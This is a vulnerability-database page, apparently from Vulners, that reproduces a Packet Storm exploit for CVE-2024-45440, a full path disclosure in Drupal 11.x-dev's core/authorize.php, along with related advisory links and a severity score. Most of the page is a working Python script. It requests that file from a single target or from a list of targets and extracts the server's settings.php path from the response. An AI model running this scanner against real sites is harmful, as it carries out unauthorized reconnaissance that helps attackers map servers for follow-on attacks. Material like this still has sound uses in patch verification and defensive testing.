Lucene search
+L

📄 Drupal 11.x-dev Path Disclosure

🗓️ 21 Apr 2025 00:00:00Reported by Milad KarimiType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 200 Views

Drupal 11.x-dev has a Full Path Disclosure vulnerability affecting core/authorize.php due to hash_salt.

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for Generation of Error Message Containing Sensitive Information in Drupal
10 Feb 202616:18
githubexploit
BDU FSTEC
The vulnerability of the /core/authorize.php file in the Drupal CMS system allows a hacker to disclose protected information.
3 Oct 202400:00
bdu_fstec
Circl
CVE-2024-45440
29 Aug 202413:42
circl
CNNVD
Drupal 安全漏洞
29 Aug 202400:00
cnnvd
CVE
CVE-2024-45440
29 Aug 202400:00
cve
Cvelist
CVE-2024-45440
29 Aug 202400:00
cvelist
Exploit DB
Drupal 11.x-dev - Full Path Disclosure
19 Apr 202500:00
exploitdb
Github Security Blog
Drupal Full Path Disclosure
29 Aug 202412:31
github
Nuclei
Drupal 11.x-dev - Full Path Disclosure
18 Jul 202608:12
nuclei
NVD
CVE-2024-45440
29 Aug 202411:15
nvd
Rows per page
#!/usr/bin/env python
    # Exploit Title: Drupal 11.x-dev - Full Path Disclosure
    # Date: 2025-04-16
    # Exploit Author: Milad Karimi (Ex3ptionaL)
    # Contact: [email protected] # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
    # MiRROR-H: https://mirror-h.org/search/hacker/49626/
    # Version: 11.x-dev
    # CVE: CVE-2024-45440
    
    # -*- coding:UTF-8 -*-
    import re
    import requests
    def banners():
        cve_id = "CVE-2024-45440"
        description = "Drupal 11.x-dev Full Path Disclosure Vulnerability: " \
                      "core/authorize.php allows Full Path Disclosure (even
    when error logging is None) " \
                      "if the value of hash_salt is file_get_contents of a file
    that does not exist."
        disclaimer = "This tool is for educational purposes only. Any misuse of
    this information is the responsibility of " \
                     "the person utilizing this tool. The author assumes no
    responsibility or liability for any misuse or " \
                     "damage caused by this program."
        width = 100
        banner_top_bottom = "=" * width
        banner_middle = f"{cve_id:^{width}}\n\n{description:^{width}}"
        banner =
    f"{banner_top_bottom}\n\n{banner_middle}\n\n{disclaimer}\n\n{banner_top_bottom}"
    
        return banner
    def scan_single_url(url=None):
        if url is None:
            print("[+] Input the IP/Domain Example: 127.0.0.1 or 127.0.0.1:8080")
    
            url = input("[+] IP/Domain: ")
        if not url.startswith('https://') and not url.startswith('http://'):
            full_url = 'http://' + url + '/core/authorize.php'
        print("[*] Scanning...")
        try:
            headers = {
                "Host": url,
                "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64;
    rv:133.0) Gecko/20100101 Firefox/133.0",
                "Accept":
    "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
                "Accept-Language":
    "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2"
            }
            response = requests.get(full_url, headers,timeout=10)
            pattern = r'<em class="placeholder">(/.*?settings\.php)'
            matches = re.findall(pattern, response.text)
            # print(response.text)
            if 'settings.php' in response.text:
                print(f"[+] {url} Existed!")
                for match in matches:
                    print("[+] The full path is:", match)
                    return True
            else:
                print(f"[-] {url} Not Exist!")
                return False
        except TimeoutError:
            print(f"[-] {url} Timeout!")
        except Exception as e:
            print(f"[-] {url} Failed!")
            return False
    def scan_multiple_urls():
        print("[+] Input the path of txt Example: ./url.txt or
    C:\\the\\path\\to\\url.txt")
        url_path = input("[+] Path: ")
        url_list = []
        result_list = []
        try:
            with open(url_path, 'r', encoding='utf-8') as f:
                lines = f.readlines()
                for line in lines:
                    url_list.append(line.strip())
        except FileNotFoundError as e:
            print("[-] File Not Found!")
        for url in url_list:
            result = scan_single_url(url)
            if result:
                result_list.append(url)
        print("[+] Successful Target:")
        for result in result_list:
            print(f"[+] {result}")
    def main():
        print(banners())
        print("[1] Scan single url\n[2] Scan multiple urls")
        choice = input("[+] Choose: ")
        if choice == '1':
            scan_single_url()
        elif choice == '2':
            scan_multiple_urls()
        else:
            print("[-] Invalid option selected!")
        pass
    if __name__ == '__main__':
        main()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

21 Apr 2025 00:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 3.15.3
EPSS0.09269
SSVC
200